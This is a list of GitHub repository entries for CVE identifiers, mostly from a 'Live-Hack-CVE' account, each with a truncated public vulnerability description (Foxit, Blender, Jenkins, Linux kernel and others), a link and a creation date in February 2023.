**An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's PDF Reader, version 9.1.0.5096. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3943](https://github.com/Live-Hack-CVE/CVE-2018-3943) create time: 2023-02-02T23:55:35Z

**An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's PDF Reader, version 9.1.0.5096. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3944](https://github.com/Live-Hack-CVE/CVE-2018-3944) create time: 2023-02-02T23:55:32Z

**An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's PDF Reader, version 9.1.0.5096. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3942](https://github.com/Live-Hack-CVE/CVE-2018-3942) create time: 2023-02-02T23:55:28Z

**An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader version 9.1.0.5096. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malic CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3941](https://github.com/Live-Hack-CVE/CVE-2018-3941) create time: 2023-02-02T23:55:25Z

**An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's PDF Reader, version 9.1.0.5096. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3939](https://github.com/Live-Hack-CVE/CVE-2018-3939) create time: 2023-02-02T23:55:21Z

**An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's PDF Reader, version 9.1.0.5096. A specially crafted PDF document can trigger a previously freed object in memory to be reused. An attacker needs to trick the user to open the malicious file to trigger. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3940](https://github.com/Live-Hack-CVE/CVE-2018-3940) create time: 2023-02-02T23:55:18Z

**Command Injection in EdgeMAX EdgeSwitch prior to 1.8.2 allow an Admin user to execute commands as root. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5446](https://github.com/Live-Hack-CVE/CVE-2019-5446) create time: 2023-02-02T23:54:55Z

**DoS in EdgeMAX EdgeSwitch prior to 1.8.2 allow an Admin user to Crash the SSH CLI interface by using crafted commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5445](https://github.com/Live-Hack-CVE/CVE-2019-5445) create time: 2023-02-02T23:54:51Z

**When in an endless loop, a website specifying a custom cursor using CSS could make it look like the user is interacting with the user interface, when they are not. This could lead to a perceived broken state, especially when interactions with existing browser dialogs and warnings do not work. This vulnerability affects CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15654](https://github.com/Live-Hack-CVE/CVE-2020-15654) create time: 2023-02-02T23:55:06Z

**An iframe sandbox element with the allow-popups flag could be bypassed when using noopener links. This could have led to security issues for websites relying on sandbox configurations that allowed popups and hosted arbitrary content. This vulnerability affects Firefox ESR < 78.1, Firefox < 79, and Thunderbird < 78.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15653](https://github.com/Live-Hack-CVE/CVE-2020-15653) create time: 2023-02-02T23:55:03Z

**JIT optimizations involving the Javascript arguments object could confuse later optimizations. This risk was already mitigated by various precautions in the code, resulting in this bug rated at only moderate severity. This vulnerability affects Firefox ESR < 78.1, Firefox < 79, and Thunderbird < 78.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15656](https://github.com/Live-Hack-CVE/CVE-2020-15656) create time: 2023-02-02T23:54:59Z

**A sandboxing issue in Odoo Community 11.0 through 13.0 and Odoo Enterprise 11.0 through 13.0, when running with Python 3.6 or later, allows remote authenticated users to execute arbitrary code, leading to privilege escalation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-29396](https://github.com/Live-Hack-CVE/CVE-2020-29396) create time: 2023-02-02T23:54:48Z

**An issue was discovered in Legion of the Bouncy Castle BC Java 1.65 and 1.66. The OpenBSDBCrypt.checkPassword utility method compared incorrect data when checking the password, allowing incorrect passwords to indicate they were matching with previously hashed ones that were different. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28052](https://github.com/Live-Hack-CVE/CVE-2020-28052) create time: 2023-02-02T23:54:44Z

**get_gate_page in mm/gup.c in the Linux kernel 5.7.x and 5.8.x before 5.8.7 allows privilege escalation because of incorrect reference counting (caused by gate page mishandling) of the struct page that backs the vsyscall page. The result is a refcount underflow. This can be triggered by any 64-bit process that can use p CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25221](https://github.com/Live-Hack-CVE/CVE-2020-25221) create time: 2023-02-02T23:54:40Z

**The code for downloading files did not properly take care of special characters, which led to an attacker being able to cut off the file ending at an earlier position, leading to a different file type being downloaded than shown in the dialog. This vulnerability affects Firefox ESR < 78.1, Firefox < 79, and Thunderbird CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15658](https://github.com/Live-Hack-CVE/CVE-2020-15658) create time: 2023-02-02T23:54:37Z

**A flaw was found in the Linux kernel’s implementation of MIDI, where an attacker with a local account and the permissions to issue ioctl commands to midi devices could trigger a use-after-free issue. A write to this specific memory while freed and before use causes the flow of execution to change and possibly allow for CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27786](https://github.com/Live-Hack-CVE/CVE-2020-27786) create time: 2023-02-02T23:54:33Z

**RuoYi up to v4.7.5 was discovered to contain a SQL injection vulnerability via the component /tool/gen/createTable. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48114](https://github.com/Live-Hack-CVE/CVE-2022-48114) create time: 2023-02-02T23:55:13Z

**A vulnerability in TOTOLINK N200RE_v5 firmware V9.3.5u.6139 allows unauthenticated attackers to access the telnet service via a crafted POST request. Attackers are also able to leverage this vulnerability to login as root via hardcoded credentials. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48113](https://github.com/Live-Hack-CVE/CVE-2022-48113) create time: 2023-02-02T23:55:10Z

**CVE-2015-5180 glibc: DNS resolver NULL pointer dereference with crafted record type CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-5180](https://github.com/Live-Hack-CVE/CVE-2015-5180) create time: 2023-02-02T21:41:05Z

**An off-by-one array indexing error was found in the libunwind API, which could cause an error when reading untrusted binaries or dwarf debug info data. Red Hat products do not call the API in this way; and it is unlikely that any exploitable attack vector exists in current builds or supported usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-3239](https://github.com/Live-Hack-CVE/CVE-2015-3239) create time: 2023-02-02T21:41:01Z

**A flaw was discovered in the way Libreswan's IKE daemon processed certain IKEv1 payloads. A remote attacker could send specially crafted IKEv1 payloads that, when processed, would lead to a denial of service (daemon crash). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-3204](https://github.com/Live-Hack-CVE/CVE-2015-3204) create time: 2023-02-02T21:40:58Z

**It was discovered that when uploading a file using a multipart/form-data submission to the EAP Web Console, the Console was vulnerable to Cross-Site Request Forgery (CSRF). This meant that an attacker could use the flaw together with a forgery attack to make changes to an authenticated instance. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-5188](https://github.com/Live-Hack-CVE/CVE-2015-5188) create time: 2023-02-02T21:40:54Z

**It was found that ntpd could crash due to an uninitialized variable when processing malformed logconfig configuration commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-5194](https://github.com/Live-Hack-CVE/CVE-2015-5194) create time: 2023-02-02T21:40:50Z

**It was found that ntpd would exit with a segmentation fault when a statistics type that was not enabled during compilation (e.g. timingstats) was referenced by the statistics or filegen configuration command. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-5195](https://github.com/Live-Hack-CVE/CVE-2015-5195) create time: 2023-02-02T21:40:47Z

**A heap-based buffer overflow was discovered in the way the texttopdf utility of cups-filter processed print jobs with a specially crafted line size. An attacker able to submit print jobs could use this flaw to crash texttopdf or, possibly, execute arbitrary code with the privileges of the "lp" user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-3258](https://github.com/Live-Hack-CVE/CVE-2015-3258) create time: 2023-02-02T21:40:43Z

**A race condition was found in the way the pcsd web UI backend performed authorization of user requests. An attacker could use this flaw to send a request that would be evaluated as originating from a different user, potentially allowing the attacker to perform actions with permissions of a more privileged user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-5189](https://github.com/Live-Hack-CVE/CVE-2015-5189) create time: 2023-02-02T21:40:38Z

**An exploitable integer overflow exists in the way that the Blender open-source 3d creation suite v2.78c converts text rendered as a font into a curve. A specially crafted .blend file can cause an integer overflow resulting in a buffer overflow which can allow for code execution under the context of the application. An CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12103](https://github.com/Live-Hack-CVE/CVE-2017-12103) create time: 2023-02-02T21:40:04Z

**An exploitable integer overflow exists in the way that the Blender open-source 3d creation suite v2.78c draws a Particle object. A specially crafted .blend file can cause an integer overflow resulting in a buffer overflow which can allow for code execution under the context of the application. An attacker can convince CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12104](https://github.com/Live-Hack-CVE/CVE-2017-12104) create time: 2023-02-02T21:40:00Z

**An exploitable integer overflow exists in the way that the Blender open-source 3d creation suite v2.78c applies a particular object modifier to a Mesh. A specially crafted .blend file can cause an integer overflow resulting in a buffer overflow which can allow for code execution under the context of the application. An CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12105](https://github.com/Live-Hack-CVE/CVE-2017-12105) create time: 2023-02-02T21:39:57Z

**An exploitable integer overflow exists in the 'CustomData' Mesh loading functionality of the Blender open-source 3d creation suite. A .blend file with a specially crafted external data file can cause an integer overflow resulting in a buffer overflow which can allow for code execution under the context of the applicati CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12082](https://github.com/Live-Hack-CVE/CVE-2017-12082) create time: 2023-02-02T21:39:53Z

**An exploitable integer overflow exists in the 'BKE_mesh_calc_normals_tessface' functionality of the Blender open-source 3d creation suite. A specially crafted .blend file can cause an integer overflow resulting in a buffer overflow which can allow for code execution under the context of the application. An attacker can CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12086](https://github.com/Live-Hack-CVE/CVE-2017-12086) create time: 2023-02-02T21:39:49Z

**An exploitable integer overflow exists in the upgrade of the legacy Mesh attribute 'tface' of the Blender open-source 3d creation suite v2.78c. A specially crafted .blend file can cause an integer overflow resulting in a buffer overflow which can allow for code execution under the context of the application. An attacke CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12099](https://github.com/Live-Hack-CVE/CVE-2017-12099) create time: 2023-02-02T21:39:45Z

**An exploitable integer overflow exists in the way that the Blender open-source 3d creation suite v2.78c converts curves to polygons. A specially crafted .blend file can cause an integer overflow resulting in a buffer overflow which can allow for code execution under the context of the application. An attacker can convi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12102](https://github.com/Live-Hack-CVE/CVE-2017-12102) create time: 2023-02-02T21:39:41Z

**An exploitable integer overflow exists in the 'multires_load_old_dm' functionality of the Blender open-source 3d creation suite v2.78c. A specially crafted .blend file can cause an integer overflow resulting in a buffer overflow which can allow for code execution under the context of the application. An attacker can co CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12100](https://github.com/Live-Hack-CVE/CVE-2017-12100) create time: 2023-02-02T21:39:38Z

**An exploitable integer overflow exists in the 'modifier_mdef_compact_influences' functionality of the Blender open-source 3d creation suite v2.78c. A specially crafted .blend file can cause an integer overflow resulting in a buffer overflow which can allow for code execution under the context of the application. An att CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12101](https://github.com/Live-Hack-CVE/CVE-2017-12101) create time: 2023-02-02T21:39:34Z

**An exploitable out-of-bounds write exists in the TIFF parsing functionality of Canvas Draw version 4.0.0. A specially crafted TIFF image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a TIFF image to trigger this vulnerability and gain code executio CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3859](https://github.com/Live-Hack-CVE/CVE-2018-3859) create time: 2023-02-02T21:40:35Z

**An exploitable out-of-bounds write exists in the PCX parsing functionality of Canvas Draw version 4.0.0. A specially crafted PCX image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a PCX image to trigger this vulnerability and gain code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3871](https://github.com/Live-Hack-CVE/CVE-2018-3871) create time: 2023-02-02T21:40:31Z

**An exploitable heap overflow exists in the TIFF parsing functionality of Canvas Draw version 4.0.0. A specially crafted TIFF image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a TIFF image to trigger this vulnerability and gain the ability to exec CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3858](https://github.com/Live-Hack-CVE/CVE-2018-3858) create time: 2023-02-02T21:40:27Z

**An exploitable out-of-bounds write exists in the PCX parsing functionality of Canvas Draw version 4.0.0. A specially crafted PCX image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a PCX image to trigger this vulnerability and gain code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3870](https://github.com/Live-Hack-CVE/CVE-2018-3870) create time: 2023-02-02T21:40:24Z

**An exploitable out-of-bounds write exists in the TIFF parsing functionality of Canvas Draw version 4.0.0. A specially crafted TIFF image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a TIFF image to trigger this vulnerability and gain the ability t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3860](https://github.com/Live-Hack-CVE/CVE-2018-3860) create time: 2023-02-02T21:40:20Z

**Improper limitation of path names in Veeam Backup & Replication 9.5U3, 9.5U4,10.x, and 11.x allows remote authenticated users access to internal API functions that allows attackers to upload and execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26500](https://github.com/Live-Hack-CVE/CVE-2022-26500) create time: 2023-02-02T21:40:12Z

**Veeam Backup & Replication 10.x and 11.x has Incorrect Access Control (issue 1 of 2). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26501](https://github.com/Live-Hack-CVE/CVE-2022-26501) create time: 2023-02-02T21:40:08Z

**An exploitable firmware modification vulnerability was discovered in certain Netgear products. The data integrity of the uploaded firmware image is ensured with a fixed checksum number. Therefore, an attacker can conduct a MITM attack to modify the user-uploaded firmware image and bypass the checksum verification. This CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23110](https://github.com/Live-Hack-CVE/CVE-2023-23110) create time: 2023-02-02T21:40:16Z

**** DISPUTED ** The fill_input_buffer function in jdatasrc.c in libjpeg-turbo 1.5.1 allows remote attackers to cause a denial of service (invalid memory access and application crash) or possibly have unspecified other impact via a crafted jpg file. NOTE: Maintainer asserts the issue is due to a bug in downstream code ca CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-9614](https://github.com/Live-Hack-CVE/CVE-2017-9614) create time: 2023-02-02T19:28:59Z

**A flaw was discovered in fence-agents, prior to version 4.3.4, where using non-ASCII characters in a guest VM's comment or other fields would cause fence_rhevm to exit with an exception. In cluster environments, this could lead to preventing automated recovery or otherwise denying service to clusters of which that VM i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10153](https://github.com/Live-Hack-CVE/CVE-2019-10153) create time: 2023-02-02T19:28:50Z

**Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer ove CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41026](https://github.com/Live-Hack-CVE/CVE-2022-41026) create time: 2023-02-02T19:29:34Z

**Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer ove CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41025](https://github.com/Live-Hack-CVE/CVE-2022-41025) create time: 2023-02-02T19:29:30Z

**Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer ove CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41024](https://github.com/Live-Hack-CVE/CVE-2022-41024) create time: 2023-02-02T19:29:26Z

**Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer ove CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41023](https://github.com/Live-Hack-CVE/CVE-2022-41023) create time: 2023-02-02T19:29:22Z

**Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer ove CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41022](https://github.com/Live-Hack-CVE/CVE-2022-41022) create time: 2023-02-02T19:29:18Z

**Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer ove CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41021](https://github.com/Live-Hack-CVE/CVE-2022-41021) create time: 2023-02-02T19:29:13Z

**Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer ove CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41020](https://github.com/Live-Hack-CVE/CVE-2022-41020) create time: 2023-02-02T19:29:09Z

**A denial of service vulnerability was found in tildearrow Furnace. It has been classified as problematic. This is due to an incomplete fix of CVE-2022-1211. It is possible to initiate the attack remotely but it requires user interaction. The issue got fixed with the patch 0eb02422d5161767e9983bdaa5c429762d3477ce. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1289](https://github.com/Live-Hack-CVE/CVE-2022-1289) create time: 2023-02-02T19:28:46Z

**** DISPUTED ** Connectwise Control 22.8.10013.8329 is vulnerable to Cross Origin Resource Sharing (CORS). The vendor's position is that two endpoints have Access-Control-Allow-Origin wildcarding to support product functionality, and that there is no risk from this behavior. The vulnerability report is thus not valid. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23128](https://github.com/Live-Hack-CVE/CVE-2023-23128) create time: 2023-02-02T18:23:35Z

**** DISPUTED ** In Connectwise Control 22.8.10013.8329, the login page does not implement HSTS headers therefore not enforcing HTTPS. NOTE: the vendor's position is that, by design, this is controlled by a configuration option in which a customer can choose to use HTTP (rather than HTTPS) during troubleshooting. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23127](https://github.com/Live-Hack-CVE/CVE-2023-23127) create time: 2023-02-02T18:23:31Z

**A vulnerability was found in FastCMS 0.1.0. It has been classified as critical. Affected is an unknown function of the component Template Management. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-220038 is t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0651](https://github.com/Live-Hack-CVE/CVE-2023-0651) create time: 2023-02-02T18:23:27Z

**A vulnerability was found in YAFNET up to 3.1.11 and classified as problematic. This issue affects some unknown processing of the component Signature Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0650](https://github.com/Live-Hack-CVE/CVE-2023-0650) create time: 2023-02-02T18:23:24Z

**Jenkins OpenID Plugin 2.4 and earlier improperly determines that a redirect URL after login is legitimately pointing to Jenkins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24445](https://github.com/Live-Hack-CVE/CVE-2023-24445) create time: 2023-02-02T18:23:20Z

**man-db before 2.8.5 on Gentoo allows local users (with access to the man user account) to gain root privileges because /usr/bin/mandb is executed by root but not owned by root. (Also, the owner can strip the setuid and setgid bits.) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25078](https://github.com/Live-Hack-CVE/CVE-2018-25078) create time: 2023-02-02T18:23:16Z

**A flaw was found in moodle before versions 3.7.1, 3.6.5, 3.5.7. A sesskey (CSRF) token was not being utilised by the XML loading/unloading admin tool. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10186](https://github.com/Live-Hack-CVE/CVE-2019-10186) create time: 2023-02-02T18:22:26Z

**An issue was discovered in the CheckUser extension for MediaWiki through 1.39.x. Various components of this extension can expose information on the performer of edits and logged actions. This information should not allow public viewing: it is supposed to be viewable only by users with checkuser access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39193](https://github.com/Live-Hack-CVE/CVE-2022-39193) create time: 2023-02-02T18:22:31Z

**A flaw was found in the Linux kernel. A null pointer dereference in bond_ipsec_add_sa() may lead to local denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0286](https://github.com/Live-Hack-CVE/CVE-2022-0286) create time: 2023-02-02T18:22:22Z

**no description** : [miko550/CVE-2022-46169](https://github.com/miko550/CVE-2022-46169) create time: 2023-02-02T18:21:08Z

**A stored cross-site scripting (XSS) vulnerability exists in Tenable.sc due to improper validation of user-supplied input before returning it to users. An authenticated, remote attacker can exploit this by convincing a user to click a specially crafted URL, to execute arbitrary script code in a user's browser session. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24494](https://github.com/Live-Hack-CVE/CVE-2023-24494) create time: 2023-02-02T18:23:10Z

**A formula injection vulnerability exists in Tenable.sc due to improper validation of user-supplied input before returning it to users. An authenticated attacker could leverage the reporting system to export reports containing formulas, which would then require a victim to approve and execute on a host. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24493](https://github.com/Live-Hack-CVE/CVE-2023-24493) create time: 2023-02-02T18:23:06Z

**A missing permission check in Jenkins BearyChat Plugin 3.0.2 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24459](https://github.com/Live-Hack-CVE/CVE-2023-24459) create time: 2023-02-02T18:23:03Z

**A cross-site request forgery (CSRF) vulnerability in Jenkins BearyChat Plugin 3.0.2 and earlier allows attackers to connect to an attacker-specified URL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24458](https://github.com/Live-Hack-CVE/CVE-2023-24458) create time: 2023-02-02T18:22:59Z

**A cross-site request forgery (CSRF) vulnerability in Jenkins Keycloak Authentication Plugin 2.3.0 and earlier allows attackers to trick users into logging in to the attacker's account. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24457](https://github.com/Live-Hack-CVE/CVE-2023-24457) create time: 2023-02-02T18:22:55Z

**Jenkins Keycloak Authentication Plugin 2.3.0 and earlier does not invalidate the previous session on login. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24456](https://github.com/Live-Hack-CVE/CVE-2023-24456) create time: 2023-02-02T18:22:51Z

**Jenkins visualexpert Plugin 1.3 and earlier does not restrict the names of files in methods implementing form validation, allowing attackers with Item/Configure permission to check for the existence of an attacker-specified file path on the Jenkins controller file system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24455](https://github.com/Live-Hack-CVE/CVE-2023-24455) create time: 2023-02-02T18:22:47Z

**Jenkins TestQuality Updater Plugin 1.3 and earlier stores the TestQuality Updater password unencrypted in its global configuration file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24454](https://github.com/Live-Hack-CVE/CVE-2023-24454) create time: 2023-02-02T18:22:43Z

**A missing check in Jenkins TestQuality Updater Plugin 1.3 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified username and password. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24453](https://github.com/Live-Hack-CVE/CVE-2023-24453) create time: 2023-02-02T18:22:39Z

**A cross-site request forgery (CSRF) vulnerability in Jenkins TestQuality Updater Plugin 1.3 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified username and password. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24452](https://github.com/Live-Hack-CVE/CVE-2023-24452) create time: 2023-02-02T18:22:36Z

**CVE-2011-2920 Satellite: XSS flaw(s) in filter handling CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-2920](https://github.com/Live-Hack-CVE/CVE-2011-2920) create time: 2023-02-02T16:11:02Z

**A flaw was found in JBoss web services where the services used a weak symmetric encryption protocol, PKCS#1 v1.5. An attacker could use this weakness in chosen-ciphertext attacks to recover the symmetric key and conduct further attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-2487](https://github.com/Live-Hack-CVE/CVE-2011-2487) create time: 2023-02-02T16:10:55Z

**CVE-2011-2927 Satellite/Spacewalk: XSS flaw in channels search CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-2927](https://github.com/Live-Hack-CVE/CVE-2011-2927) create time: 2023-02-02T16:10:51Z

**CVE-2011-4127 kernel: possible privilege escalation via SG_IO ioctl CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-4127](https://github.com/Live-Hack-CVE/CVE-2011-4127) create time: 2023-02-02T16:10:43Z

**CVE-2011-3344 Satellite/Spacewalk: XSS on the Lost Password page CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-3344](https://github.com/Live-Hack-CVE/CVE-2011-3344) create time: 2023-02-02T16:10:39Z

**CVE-2011-3609 JBoss AS: CSRF in the administration console & HTTP management API CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-3609](https://github.com/Live-Hack-CVE/CVE-2011-3609) create time: 2023-02-02T16:10:16Z

**CVE-2012-2386 php: Integer overflow leading to heap-buffer overflow in the Phar extension CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-2386](https://github.com/Live-Hack-CVE/CVE-2012-2386) create time: 2023-02-02T16:10:59Z

**It was found that the distcheck rule in Automake-generated Makefiles made a directory world-writable when preparing source archives. If a malicious, local user could access this directory, they could execute arbitrary code with the privileges of the user running "make distcheck". CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-3386](https://github.com/Live-Hack-CVE/CVE-2012-3386) create time: 2023-02-02T16:10:27Z

**It was found that the "/var/lib/openhpi" directory provided by OpenHPI used world-writeable and world-readable permissions. A local user could use this flaw to view, modify, and delete OpenHPI-related data, or even fill up the storage device hosting the /var/lib directory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-3248](https://github.com/Live-Hack-CVE/CVE-2015-3248) create time: 2023-02-02T16:10:35Z

**A race condition flaw, leading to a heap-based memory corruption, was found in spice's worker_update_monitors_config() function, which runs under the QEMU-KVM context on the host. A user in a guest could leverage this flaw to crash the host QEMU-KVM process or, possibly, execute arbitrary code with the privileges of th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-3247](https://github.com/Live-Hack-CVE/CVE-2015-3247) create time: 2023-02-02T16:10:20Z

**A flaw was found in the provisioning template handling in foreman. An attacker, with permissions to create templates, can cause internal Rails information to be displayed when it is processed, resulting in potentially sensitive information being disclosed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-3693](https://github.com/Live-Hack-CVE/CVE-2016-3693) create time: 2023-02-02T16:10:31Z

**It was found that the private key for the node certificate was contained in a world-readable file. A local user could possibly use this flaw to gain access to the private key information in the file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-3107](https://github.com/Live-Hack-CVE/CVE-2016-3107) create time: 2023-02-02T16:10:12Z

**CVE-2016-9921 CVE-2016-9922 Qemu: display: cirrus_vga: a divide by zero in cirrus_do_copy CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-9922](https://github.com/Live-Hack-CVE/CVE-2016-9922) create time: 2023-02-02T16:10:08Z

**Privilege escalation flaws were found in the Red Hat initialization scripts of PostgreSQL. An attacker with access to the postgres user account could use these flaws to obtain root access on the server machine. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-15097](https://github.com/Live-Hack-CVE/CVE-2017-15097) create time: 2023-02-02T16:10:24Z

